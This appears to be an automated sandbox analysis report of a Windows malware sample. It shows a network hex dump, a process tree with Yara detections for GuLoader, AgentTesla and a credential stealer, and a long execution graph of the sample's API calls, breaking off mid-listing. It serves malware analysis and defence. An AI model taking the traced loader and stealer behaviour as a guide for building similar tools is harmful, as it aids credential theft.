                                                May 27, 2022 21:11:34.831994057 CEST359INData Raw: e1 eb 9f 35 22 9c 81 d0 fe 10 90 8f 19 16 03 bc 11 0e 3b 83 f4 b3 1b 63 e2 1f 46 d3 90 19 52 15 ea 85 17 96 a5 09 0b 0d 50 ef 23 fb 36 86 f1 bc ac ec b8 1b 48 0c aa dc a3 3c 7c cc 3c 21 b6 db 6f 61 5e 1f 6d 92 23 7e 4c 3c 69 e1 5c e9 df f5 25 bf
                                                Data Ascii: 5";cFRP#6H<|<!oa^m#~L<i\%.&RN A%e H">0VjP{72:t:me<)X=a)5T[:^BbE(W>dv_-gPnYU1 {


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:21:11:07
                                                Start date:27/05/2022
                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                                                Imagebase:0x400000
                                                File size:1007819 bytes
                                                MD5 hash:77436B29832DED92B60491EA36018196
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Target ID:3
                                                Start time:21:11:22
                                                Start date:27/05/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                                                Imagebase:0x280000
                                                File size:108664 bytes
                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Target ID:4
                                                Start time:21:11:23
                                                Start date:27/05/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
                                                Imagebase:0xa80000
                                                File size:108664 bytes
                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.813096057.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate

                                                Target ID:5
                                                Start time:21:11:23
                                                Start date:27/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7fba80000
                                                File size:875008 bytes
                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:20.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.1%
                                                  Total number of Nodes:1574
                                                  Total number of Limit Nodes:39
                                                  execution_graph 3933 401941 3934 401943 3933->3934 3939 402da6 3934->3939 3940 402db2 3939->3940 3985 40657a 3940->3985 3943 401948 3945 405c49 3943->3945 4027 405f14 3945->4027 3948 405c71 DeleteFileW 3950 401951 3948->3950 3949 405c88 3951 405db3 3949->3951 4041 40653d lstrcpynW 3949->4041 3951->3950 4070 406873 FindFirstFileW 3951->4070 3953 405cae 3954 405cc1 3953->3954 3955 405cb4 lstrcatW 3953->3955 4042 405e58 lstrlenW 3954->4042 3956 405cc7 3955->3956 3959 405cd7 lstrcatW 3956->3959 3960 405ccd 3956->3960 3962 405ce2 lstrlenW FindFirstFileW 3959->3962 3960->3959 3960->3962 3964 405da8 3962->3964 3983 405d04 3962->3983 3963 405dd1 4073 405e0c lstrlenW CharPrevW 3963->4073 3964->3951 3967 405c01 5 API calls 3970 405de3 3967->3970 3969 405d8b FindNextFileW 3971 405da1 FindClose 3969->3971 3969->3983 3972 405de7 3970->3972 3973 405dfd 3970->3973 3971->3964 3972->3950 3976 40559f 24 API calls 3972->3976 3975 40559f 24 API calls 3973->3975 3975->3950 3978 405df4 3976->3978 3977 405c49 60 API calls 3977->3983 3980 4062fd 36 API calls 3978->3980 3979 40559f 24 API calls 3979->3969 3981 405dfb 3980->3981 3981->3950 3983->3969 3983->3977 3983->3979 4046 40653d lstrcpynW 3983->4046 4047 405c01 3983->4047 4055 40559f 3983->4055 4066 4062fd MoveFileExW 3983->4066 3986 406587 3985->3986 3987 4067aa 3986->3987 3990 406778 lstrlenW 3986->3990 3992 40657a 10 API calls 3986->3992 3993 40668f GetSystemDirectoryW 3986->3993 3996 4066a2 GetWindowsDirectoryW 3986->3996 3997 406719 lstrcatW 3986->3997 3998 40657a 10 API calls 3986->3998 3999 4067c4 5 API calls 3986->3999 4000 4066d1 SHGetSpecialFolderLocation 3986->4000 4011 40640b 3986->4011 4016 406484 wsprintfW 3986->4016 4017 40653d lstrcpynW 3986->4017 3988 402dd3 3987->3988 4018 40653d lstrcpynW 3987->4018 3988->3943 4002 4067c4 3988->4002 3990->3986 3992->3990 3993->3986 3996->3986 3997->3986 3998->3986 3999->3986 4000->3986 4001 4066e9 SHGetPathFromIDListW CoTaskMemFree 4000->4001 4001->3986 4009 4067d1 4002->4009 4003 406847 4004 40684c CharPrevW 4003->4004 4006 40686d 4003->4006 4004->4003 4005 40683a CharNextW 4005->4003 4005->4009 4006->3943 4008 406826 CharNextW 4008->4009 4009->4003 4009->4005 4009->4008 4010 406835 CharNextW 4009->4010 4023 405e39 4009->4023 4010->4005 4019 4063aa 4011->4019 4014 40646f 4014->3986 4015 40643f RegQueryValueExW RegCloseKey 4015->4014 4016->3986 4017->3986 4018->3988 4020 4063b9 4019->4020 4021 4063c2 RegOpenKeyExW 4020->4021 4022 4063bd 4020->4022 4021->4022 4022->4014 4022->4015 4024 405e3f 4023->4024 4025 405e55 4024->4025 4026 405e46 CharNextW 4024->4026 4025->4009 4026->4024 4076 40653d lstrcpynW 4027->4076 4029 405f25 4077 405eb7 CharNextW CharNextW 4029->4077 4032 405c69 4032->3948 4032->3949 4033 4067c4 5 API calls 4038 405f3b 4033->4038 4034 405f6c lstrlenW 4035 405f77 4034->4035 4034->4038 4037 405e0c 3 API calls 4035->4037 4036 406873 2 API calls 4036->4038 4039 405f7c GetFileAttributesW 4037->4039 4038->4032 4038->4034 4038->4036 4040 405e58 2 API calls 4038->4040 4039->4032 4040->4034 4041->3953 4043 405e66 4042->4043 4044 405e78 4043->4044 4045 405e6c CharPrevW 4043->4045 4044->3956 4045->4043 4045->4044 4046->3983 4083 406008 GetFileAttributesW 4047->4083 4050 405c2e 4050->3983 4051 405c24 DeleteFileW 4053 405c2a 4051->4053 4052 405c1c RemoveDirectoryW 4052->4053 4053->4050 4054 405c3a SetFileAttributesW 4053->4054 4054->4050 4056 4055ba 4055->4056 4065 40565c 4055->4065 4057 4055d6 lstrlenW 4056->4057 4058 40657a 17 API calls 4056->4058 4059 4055e4 lstrlenW 4057->4059 4060 4055ff 4057->4060 4058->4057 4061 4055f6 lstrcatW 4059->4061 4059->4065 4062 405612 4060->4062 4063 405605 SetWindowTextW 4060->4063 4061->4060 4064 405618 SendMessageW SendMessageW SendMessageW 4062->4064 4062->4065 4063->4062 4064->4065 4065->3983 4067 40631e 4066->4067 4068 406311 4066->4068 4067->3983 4086 406183 4068->4086 4071 405dcd 4070->4071 4072 406889 FindClose 4070->4072 4071->3950 4071->3963 4072->4071 4074 405dd7 4073->4074 4075 405e28 lstrcatW 4073->4075 4074->3967 4075->4074 4076->4029 4078 405ed4 4077->4078 4079 405ee6 4077->4079 4078->4079 4081 405ee1 CharNextW 4078->4081 4080 405f0a 4079->4080 4082 405e39 CharNextW 4079->4082 4080->4032 4080->4033 4081->4080 4082->4079 4084 405c0d 4083->4084 4085 40601a SetFileAttributesW 4083->4085 4084->4050 4084->4051 4084->4052 4085->4084 4087 4061b3 4086->4087 4088 4061d9 GetShortPathNameW 4086->4088 4113 40602d GetFileAttributesW CreateFileW 4087->4113 4089 4062f8 4088->4089 4090 4061ee 4088->4090 4089->4067 4090->4089 4092 4061f6 wsprintfA 4090->4092 4095 40657a 17 API calls 4092->4095 4093 4061bd CloseHandle GetShortPathNameW 4093->4089 4094 4061d1 4093->4094 4094->4088 4094->4089 4096 40621e 4095->4096 4114 40602d GetFileAttributesW CreateFileW 4096->4114 4098 40622b 4098->4089 4099 40623a GetFileSize GlobalAlloc 4098->4099 4100 4062f1 CloseHandle 4099->4100 4101 40625c 4099->4101 4100->4089 4115 4060b0 ReadFile 4101->4115 4106 40627b lstrcpyA 4109 40629d 4106->4109 4107 40628f 4108 405f92 4 API calls 4107->4108 4108->4109 4110 4062d4 SetFilePointer 4109->4110 4122 4060df WriteFile 4110->4122 4113->4093 4114->4098 4116 4060ce 4115->4116 4116->4100 4117 405f92 lstrlenA 4116->4117 4118 405fd3 lstrlenA 4117->4118 4119 405fdb 4118->4119 4120 405fac lstrcmpiA 4118->4120 4119->4106 4119->4107 4120->4119 4121 405fca CharNextA 4120->4121 4121->4118 4123 4060fd GlobalFree 4122->4123 4123->4100 4124 4015c1 4125 402da6 17 API calls 4124->4125 4126 4015c8 4125->4126 4127 405eb7 4 API calls 4126->4127 4139 4015d1 4127->4139 4128 401631 4130 401663 4128->4130 4131 401636 4128->4131 4129 405e39 CharNextW 4129->4139 4133 401423 24 API calls 4130->4133 4151 401423 4131->4151 4141 40165b 4133->4141 4138 40164a SetCurrentDirectoryW 4138->4141 4139->4128 4139->4129 4140 401617 GetFileAttributesW 4139->4140 4143 405b08 4139->4143 4146 405a6e CreateDirectoryW 4139->4146 4155 405aeb CreateDirectoryW 4139->4155 4140->4139 4158 40690a GetModuleHandleA 4143->4158 4147 405abb 4146->4147 4148 405abf GetLastError 4146->4148 4147->4139 4148->4147 4149 405ace SetFileSecurityW 4148->4149 4149->4147 4150 405ae4 GetLastError 4149->4150 4150->4147 4152 40559f 24 API calls 4151->4152 4153 401431 4152->4153 4154 40653d lstrcpynW 4153->4154 4154->4138 4156 405afb 4155->4156 4157 405aff GetLastError 4155->4157 4156->4139 4157->4156 4159 406930 GetProcAddress 4158->4159 4160 406926 4158->4160 4161 405b0f 4159->4161 4164 40689a GetSystemDirectoryW 4160->4164 4161->4139 4163 40692c 4163->4159 4163->4161 4165 4068bc wsprintfW LoadLibraryExW 4164->4165 4165->4163 4167 401c43 4189 402d84 4167->4189 4169 401c4a 4170 402d84 17 API calls 4169->4170 4171 401c57 4170->4171 4172 401c6c 4171->4172 4173 402da6 17 API calls 4171->4173 4174 401c7c 4172->4174 4175 402da6 17 API calls 4172->4175 4173->4172 4176 401cd3 4174->4176 4177 401c87 4174->4177 4175->4174 4178 402da6 17 API calls 4176->4178 4179 402d84 17 API calls 4177->4179 4180 401cd8 4178->4180 4181 401c8c 4179->4181 4183 402da6 17 API calls 4180->4183 4182 402d84 17 API calls 4181->4182 4184 401c98 4182->4184 4185 401ce1 FindWindowExW 4183->4185 4186 401cc3 SendMessageW 4184->4186 4187 401ca5 SendMessageTimeoutW 4184->4187 4188 401d03 4185->4188 4186->4188 4187->4188 4190 40657a 17 API calls 4189->4190 4191 402d99 4190->4191 4191->4169 5000 404943 5001 404953 5000->5001 5002 404979 5000->5002 5003 404499 18 API calls 5001->5003 5004 404500 8 API calls 5002->5004 5005 404960 SetDlgItemTextW 5003->5005 5006 404985 5004->5006 5005->5002 5007 4028c4 5008 4028ca 5007->5008 5009 4028d2 FindClose 5008->5009 5010 402c2a 5008->5010 5009->5010 5011 7108170d 5017 710815b6 5011->5017 5013 7108176b GlobalFree 5014 71081725 5014->5013 5015 71081740 5014->5015 5016 71081757 VirtualFree 5014->5016 5015->5013 5016->5013 5019 710815bc 5017->5019 5018 710815c2 5018->5014 5019->5018 5020 710815ce GlobalFree 5019->5020 5020->5014 5021 71081000 5024 7108101b 5021->5024 5025 710815b6 GlobalFree 5024->5025 5026 71081020 5025->5026 5027 71081024 5026->5027 5028 71081027 GlobalAlloc 5026->5028 5029 710815dd 3 API calls 5027->5029 5028->5027 5030 71081019 5029->5030 4290 4014cb 4291 40559f 24 API calls 4290->4291 4292 4014d2 4291->4292 5031 4016cc 5032 402da6 17 API calls 5031->5032 5033 4016d2 GetFullPathNameW 5032->5033 5034 4016ec 5033->5034 5040 40170e 5033->5040 5037 406873 2 API calls 5034->5037 5034->5040 5035 401723 GetShortPathNameW 5036 402c2a 5035->5036 5038 4016fe 5037->5038 5038->5040 5041 40653d lstrcpynW 5038->5041 5040->5035 5040->5036 5041->5040 5042 401e4e GetDC 5043 402d84 17 API calls 5042->5043 5044 401e60 GetDeviceCaps MulDiv ReleaseDC 5043->5044 5045 402d84 17 API calls 5044->5045 5046 401e91 5045->5046 5047 40657a 17 API calls 5046->5047 5048 401ece CreateFontIndirectW 5047->5048 5049 402638 5048->5049 5050 4045cf lstrcpynW lstrlenW 5051 402950 5052 402da6 17 API calls 5051->5052 5053 40295c 5052->5053 5054 402972 5053->5054 5055 402da6 17 API calls 5053->5055 5056 406008 2 API calls 5054->5056 5055->5054 5057 402978 5056->5057 5079 40602d GetFileAttributesW CreateFileW 5057->5079 5059 402985 5060 402a3b 5059->5060 5061 4029a0 GlobalAlloc 5059->5061 5062 402a23 5059->5062 5063 402a42 DeleteFileW 5060->5063 5064 402a55 5060->5064 5061->5062 5065 4029b9 5061->5065 5066 4032b4 31 API calls 5062->5066 5063->5064 5080 4034e5 SetFilePointer 5065->5080 5068 402a30 CloseHandle 5066->5068 5068->5060 5069 4029bf 5070 4034cf ReadFile 5069->5070 5071 4029c8 GlobalAlloc 5070->5071 5072 4029d8 5071->5072 5073 402a0c 5071->5073 5075 4032b4 31 API calls 5072->5075 5074 4060df WriteFile 5073->5074 5076 402a18 GlobalFree 5074->5076 5078 4029e5 5075->5078 5076->5062 5077 402a03 GlobalFree 5077->5073 5078->5077 5079->5059 5080->5069 5081 401956 5082 402da6 17 API calls 5081->5082 5083 40195d lstrlenW 5082->5083 5084 402638 5083->5084 5085 4014d7 5086 402d84 17 API calls 5085->5086 5087 4014dd Sleep 5086->5087 5089 402c2a 5087->5089 4638 4020d8 4639 40219c 4638->4639 4640 4020ea 4638->4640 4642 401423 24 API calls 4639->4642 4641 402da6 17 API calls 4640->4641 4643 4020f1 4641->4643 4649 4022f6 4642->4649 4644 402da6 17 API calls 4643->4644 4645 4020fa 4644->4645 4646 402110 LoadLibraryExW 4645->4646 4647 402102 GetModuleHandleW 4645->4647 4646->4639 4648 402121 4646->4648 4647->4646 4647->4648 4661 406979 4648->4661 4652 402132 4654 402151 4652->4654 4655 40213a 4652->4655 4653 40216b 4656 40559f 24 API calls 4653->4656 4666 71081817 4654->4666 4657 401423 24 API calls 4655->4657 4658 402142 4656->4658 4657->4658 4658->4649 4659 40218e FreeLibrary 4658->4659 4659->4649 4708 40655f WideCharToMultiByte 4661->4708 4663 406996 4664 40699d GetProcAddress 4663->4664 4665 40212c 4663->4665 4664->4665 4665->4652 4665->4653 4667 7108184a 4666->4667 4709 71081bff 4667->4709 4669 71081851 4670 71081976 4669->4670 4671 71081869 4669->4671 4672 71081862 4669->4672 4670->4658 4741 71082480 4671->4741 4757 7108243e 4672->4757 4677 710818cd 4683 7108191e 4677->4683 4684 710818d3 4677->4684 4678 710818af 4770 71082655 4678->4770 4679 71081898 4693 7108188e 4679->4693 4767 71082e23 4679->4767 4680 7108187f 4682 71081885 4680->4682 4687 71081890 4680->4687 4682->4693 4751 71082b98 4682->4751 4685 71082655 10 API calls 4683->4685 4789 71081666 4684->4789 4691 7108190f 4685->4691 4686 710818b5 4781 71081654 4686->4781 4761 71082810 4687->4761 4699 71081965 4691->4699 4795 71082618 4691->4795 4693->4677 4693->4678 4697 71081896 4697->4693 4698 71082655 10 API calls 4698->4691 4699->4670 4703 7108196f GlobalFree 4699->4703 4703->4670 4705 71081951 4705->4699 4799 710815dd wsprintfW 4705->4799 4706 7108194a FreeLibrary 4706->4705 4708->4663 4802 710812bb GlobalAlloc 4709->4802 4711 71081c26 4803 710812bb GlobalAlloc 4711->4803 4713 71081e6b GlobalFree GlobalFree GlobalFree 4714 71081e88 4713->4714 4727 71081ed2 4713->4727 4715 7108227e 4714->4715 4723 71081e9d 4714->4723 4714->4727 4717 710822a0 GetModuleHandleW 4715->4717 4715->4727 4716 71081d26 GlobalAlloc 4733 71081c31 4716->4733 4719 710822b1 LoadLibraryW 4717->4719 4720 710822c6 4717->4720 4718 71081d8f GlobalFree 4718->4733 4719->4720 4719->4727 4810 710816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4720->4810 4721 71081d71 lstrcpyW 4722 71081d7b lstrcpyW 4721->4722 4722->4733 4723->4727 4806 710812cc 4723->4806 4725 71082318 4725->4727 4730 71082325 lstrlenW 4725->4730 4726 71082126 4809 710812bb GlobalAlloc 4726->4809 4727->4669 4811 710816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4730->4811 4731 710822d8 4731->4725 4739 71082302 GetProcAddress 4731->4739 4733->4713 4733->4716 4733->4718 4733->4721 4733->4722 4733->4726 4733->4727 4734 71082067 GlobalFree 4733->4734 4735 710821ae 4733->4735 4736 710812cc 2 API calls 4733->4736 4804 7108162f GlobalSize GlobalAlloc 4733->4804 4734->4733 4735->4727 4738 71082216 lstrcpyW 4735->4738 4736->4733 4738->4727 4739->4725 4740 7108212f 4740->4669 4747 71082498 4741->4747 4743 710825c1 GlobalFree 4746 7108186f 4743->4746 4743->4747 4744 7108256b GlobalAlloc CLSIDFromString 4744->4743 4745 71082540 GlobalAlloc WideCharToMultiByte 4745->4743 4746->4679 4746->4680 4746->4693 4747->4743 4747->4744 4747->4745 4748 710812cc GlobalAlloc lstrcpynW 4747->4748 4750 7108258a 4747->4750 4813 7108135a 4747->4813 4748->4747 4750->4743 4817 710827a4 4750->4817 4754 71082baa 4751->4754 4752 71082c4f CreateFileA 4753 71082c6d 4752->4753 4820 71082b42 4753->4820 4754->4752 4756 71082d39 4756->4693 4758 71082453 4757->4758 4759 7108245e GlobalAlloc 4758->4759 4760 71081868 4758->4760 4759->4758 4760->4671 4765 71082840 4761->4765 4762 710828db GlobalAlloc 4766 710828fe 4762->4766 4763 710828ee 4764 710828f4 GlobalSize 4763->4764 4763->4766 4764->4766 4765->4762 4765->4763 4766->4697 4768 71082e2e 4767->4768 4769 71082e6e GlobalFree 4768->4769 4824 710812bb GlobalAlloc 4770->4824 4772 710826d8 MultiByteToWideChar 4778 7108265f 4772->4778 4773 710826fa StringFromGUID2 4773->4778 4774 7108270b lstrcpynW 4774->4778 4775 7108271e wsprintfW 4775->4778 4776 71082742 GlobalFree 4776->4778 4777 71082777 GlobalFree 4777->4686 4778->4772 4778->4773 4778->4774 4778->4775 4778->4776 4778->4777 4779 71081312 2 API calls 4778->4779 4825 71081381 4778->4825 4779->4778 4829 710812bb GlobalAlloc 4781->4829 4783 71081659 4784 71081666 2 API calls 4783->4784 4785 71081663 4784->4785 4786 71081312 4785->4786 4787 7108131b GlobalAlloc lstrcpynW 4786->4787 4788 71081355 GlobalFree 4786->4788 4787->4788 4788->4691 4790 7108169f lstrcpyW 4789->4790 4791 71081672 wsprintfW 4789->4791 4794 710816b8 4790->4794 4791->4794 4794->4698 4796 71082626 4795->4796 4798 71081931 4795->4798 4797 71082642 GlobalFree 4796->4797 4796->4798 4797->4796 4798->4705 4798->4706 4800 71081312 2 API calls 4799->4800 4801 710815fe 4800->4801 4801->4699 4802->4711 4803->4733 4805 7108164d 4804->4805 4805->4733 4812 710812bb GlobalAlloc 4806->4812 4808 710812db lstrcpynW 4808->4727 4809->4740 4810->4731 4811->4727 4812->4808 4814 71081361 4813->4814 4815 710812cc 2 API calls 4814->4815 4816 7108137f 4815->4816 4816->4747 4818 71082808 4817->4818 4819 710827b2 VirtualAlloc 4817->4819 4818->4750 4819->4818 4821 71082b4d 4820->4821 4822 71082b5d 4821->4822 4823 71082b52 GetLastError 4821->4823 4822->4756 4823->4822 4824->4778 4826 7108138a 4825->4826 4827 710813ac 4825->4827 4826->4827 4828 71081390 lstrcpyW 4826->4828 4827->4778 4828->4827 4829->4783 5090 404658 5091 404670 5090->5091 5095 40478a 5090->5095 5096 404499 18 API calls 5091->5096 5092 4047f4 5093 4048be 5092->5093 5094 4047fe GetDlgItem 5092->5094 5101 404500 8 API calls 5093->5101 5097 404818 5094->5097 5098 40487f 5094->5098 5095->5092 5095->5093 5099 4047c5 GetDlgItem SendMessageW 5095->5099 5100 4046d7 5096->5100 5097->5098 5106 40483e SendMessageW LoadCursorW SetCursor 5097->5106 5098->5093 5102 404891 5098->5102 5123 4044bb KiUserCallbackDispatcher 5099->5123 5104 404499 18 API calls 5100->5104 5105 4048b9 5101->5105 5107 4048a7 5102->5107 5108 404897 SendMessageW 5102->5108 5110 4046e4 CheckDlgButton 5104->5110 5127 404907 5106->5127 5107->5105 5113 4048ad SendMessageW 5107->5113 5108->5107 5109 4047ef 5124 4048e3 5109->5124 5121 4044bb KiUserCallbackDispatcher 5110->5121 5113->5105 5116 404702 GetDlgItem 5122 4044ce SendMessageW 5116->5122 5118 404718 SendMessageW 5119 404735 GetSysColor 5118->5119 5120 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5118->5120 5119->5120 5120->5105 5121->5116 5122->5118 5123->5109 5125 4048f1 5124->5125 5126 4048f6 SendMessageW 5124->5126 5125->5126 5126->5092 5130 405b63 ShellExecuteExW 5127->5130 5129 40486d LoadCursorW SetCursor 5129->5098 5130->5129 5131 402b59 5132 402bab 5131->5132 5134 402b60 5131->5134 5133 40690a 5 API calls 5132->5133 5136 402bb2 5133->5136 5135 402ba9 5134->5135 5137 402d84 17 API calls 5134->5137 5138 402da6 17 API calls 5136->5138 5139 402b6e 5137->5139 5140 402bbb 5138->5140 5141 402d84 17 API calls 5139->5141 5140->5135 5142 402bbf IIDFromString 5140->5142 5144 402b7a 5141->5144 5142->5135 5143 402bce 5142->5143 5143->5135 5149 40653d lstrcpynW 5143->5149 5148 406484 wsprintfW 5144->5148 5146 402beb CoTaskMemFree 5146->5135 5148->5135 5149->5146 4926 40175c 4927 402da6 17 API calls 4926->4927 4928 401763 4927->4928 4929 40605c 2 API calls 4928->4929 4930 40176a 4929->4930 4931 40605c 2 API calls 4930->4931 4931->4930 5150 401d5d 5151 402d84 17 API calls 5150->5151 5152 401d6e SetWindowLongW 5151->5152 5153 402c2a 5152->5153 4932 401ede 4933 402d84 17 API calls 4932->4933 4934 401ee4 4933->4934 4935 402d84 17 API calls 4934->4935 4936 401ef0 4935->4936 4937 401f07 EnableWindow 4936->4937 4938 401efc ShowWindow 4936->4938 4939 402c2a 4937->4939 4938->4939 4940 4056de 4941 405888 4940->4941 4942 4056ff GetDlgItem GetDlgItem GetDlgItem 4940->4942 4944 405891 GetDlgItem CreateThread CloseHandle 4941->4944 4945 4058b9 4941->4945 4986 4044ce SendMessageW 4942->4986 4944->4945 4989 405672 5 API calls 4944->4989 4947 4058e4 4945->4947 4948 4058d0 ShowWindow ShowWindow 4945->4948 4949 405909 4945->4949 4946 40576f 4952 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4946->4952 4950 4058f0 4947->4950 4951 405944 4947->4951 4988 4044ce SendMessageW 4948->4988 4956 404500 8 API calls 4949->4956 4954 4058f8 4950->4954 4955 40591e ShowWindow 4950->4955 4951->4949 4961 405952 SendMessageW 4951->4961 4959 4057e4 4952->4959 4960 4057c8 SendMessageW SendMessageW 4952->4960 4962 404472 SendMessageW 4954->4962 4957 405930 4955->4957 4958 40593e 4955->4958 4963 405917 4956->4963 4964 40559f 24 API calls 4957->4964 4965 404472 SendMessageW 4958->4965 4966 4057f7 4959->4966 4967 4057e9 SendMessageW 4959->4967 4960->4959 4961->4963 4968 40596b CreatePopupMenu 4961->4968 4962->4949 4964->4958 4965->4951 4970 404499 18 API calls 4966->4970 4967->4966 4969 40657a 17 API calls 4968->4969 4971 40597b AppendMenuW 4969->4971 4972 405807 4970->4972 4973 405998 GetWindowRect 4971->4973 4974 4059ab TrackPopupMenu 4971->4974 4975 405810 ShowWindow 4972->4975 4976 405844 GetDlgItem SendMessageW 4972->4976 4973->4974 4974->4963 4978 4059c6 4974->4978 4979 405833 4975->4979 4980 405826 ShowWindow 4975->4980 4976->4963 4977 40586b SendMessageW SendMessageW 4976->4977 4977->4963 4981 4059e2 SendMessageW 4978->4981 4987 4044ce SendMessageW 4979->4987 4980->4979 4981->4981 4982 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4981->4982 4984 405a24 SendMessageW 4982->4984 4984->4984 4985 405a4d GlobalUnlock SetClipboardData CloseClipboard 4984->4985 4985->4963 4986->4946 4987->4976 4988->4947 5154 4028de 5155 4028e6 5154->5155 5156 4028ea FindNextFileW 5155->5156 5159 4028fc 5155->5159 5157 402943 5156->5157 5156->5159 5160 40653d lstrcpynW 5157->5160 5160->5159 5161 404ce0 5162 404cf0 5161->5162 5163 404d0c 5161->5163 5172 405b81 GetDlgItemTextW 5162->5172 5165 404d12 SHGetPathFromIDListW 5163->5165 5166 404d3f 5163->5166 5168 404d29 SendMessageW 5165->5168 5169 404d22 5165->5169 5167 404cfd SendMessageW 5167->5163 5168->5166 5170 40140b 2 API calls 5169->5170 5170->5168 5172->5167 5173 401563 5174 402ba4 5173->5174 5177 406484 wsprintfW 5174->5177 5176 402ba9 5177->5176 5178 401968 5179 402d84 17 API calls 5178->5179 5180 40196f 5179->5180 5181 402d84 17 API calls 5180->5181 5182 40197c 5181->5182 5183 402da6 17 API calls 5182->5183 5184 401993 lstrlenW 5183->5184 5185 4019a4 5184->5185 5186 4019e5 5185->5186 5190 40653d lstrcpynW 5185->5190 5188 4019d5 5188->5186 5189 4019da lstrlenW 5188->5189 5189->5186 5190->5188 5191 40166a 5192 402da6 17 API calls 5191->5192 5193 401670 5192->5193 5194 406873 2 API calls 5193->5194 5195 401676 5194->5195 5196 402aeb 5197 402d84 17 API calls 5196->5197 5198 402af1 5197->5198 5199 40657a 17 API calls 5198->5199 5200 40292e 5198->5200 5199->5200 4293 4026ec 4294 402d84 17 API calls 4293->4294 4296 4026fb 4294->4296 4295 402838 4296->4295 4297 402745 ReadFile 4296->4297 4298 4060b0 ReadFile 4296->4298 4299 4027de 4296->4299 4300 402785 MultiByteToWideChar 4296->4300 4301 40283a 4296->4301 4304 4027ab SetFilePointer MultiByteToWideChar 4296->4304 4305 40284b 4296->4305 4297->4295 4297->4296 4298->4296 4299->4295 4299->4296 4307 40610e SetFilePointer 4299->4307 4300->4296 4316 406484 wsprintfW 4301->4316 4304->4296 4305->4295 4306 40286c SetFilePointer 4305->4306 4306->4295 4308 40612a 4307->4308 4315 406142 4307->4315 4309 4060b0 ReadFile 4308->4309 4310 406136 4309->4310 4311 406173 SetFilePointer 4310->4311 4312 40614b SetFilePointer 4310->4312 4310->4315 4311->4315 4312->4311 4313 406156 4312->4313 4314 4060df WriteFile 4313->4314 4314->4315 4315->4299 4316->4295 4575 40176f 4576 402da6 17 API calls 4575->4576 4577 401776 4576->4577 4578 401796 4577->4578 4579 40179e 4577->4579 4614 40653d lstrcpynW 4578->4614 4615 40653d lstrcpynW 4579->4615 4582 4017a9 4583 405e0c 3 API calls 4582->4583 4585 4017af lstrcatW 4583->4585 4584 40179c 4586 4067c4 5 API calls 4584->4586 4585->4584 4602 4017bb 4586->4602 4587 406873 2 API calls 4587->4602 4588 406008 2 API calls 4588->4602 4590 4017cd CompareFileTime 4590->4602 4591 40188d 4593 40559f 24 API calls 4591->4593 4592 401864 4594 40559f 24 API calls 4592->4594 4611 401879 4592->4611 4596 401897 4593->4596 4594->4611 4595 40653d lstrcpynW 4595->4602 4597 4032b4 31 API calls 4596->4597 4598 4018aa 4597->4598 4599 4018be SetFileTime 4598->4599 4601 4018d0 CloseHandle 4598->4601 4599->4601 4600 40657a 17 API calls 4600->4602 4603 4018e1 4601->4603 4601->4611 4602->4587 4602->4588 4602->4590 4602->4591 4602->4592 4602->4595 4602->4600 4610 405b9d MessageBoxIndirectW 4602->4610 4613 40602d GetFileAttributesW CreateFileW 4602->4613 4604 4018e6 4603->4604 4605 4018f9 4603->4605 4607 40657a 17 API calls 4604->4607 4606 40657a 17 API calls 4605->4606 4609 401901 4606->4609 4608 4018ee lstrcatW 4607->4608 4608->4609 4609->4611 4612 405b9d MessageBoxIndirectW 4609->4612 4610->4602 4612->4611 4613->4602 4614->4584 4615->4582 5201 401a72 5202 402d84 17 API calls 5201->5202 5203 401a7b 5202->5203 5204 402d84 17 API calls 5203->5204 5205 401a20 5204->5205 5206 401573 5207 401583 ShowWindow 5206->5207 5208 40158c 5206->5208 5207->5208 5209 402c2a 5208->5209 5210 40159a ShowWindow 5208->5210 5210->5209 5211 4023f4 5212 402da6 17 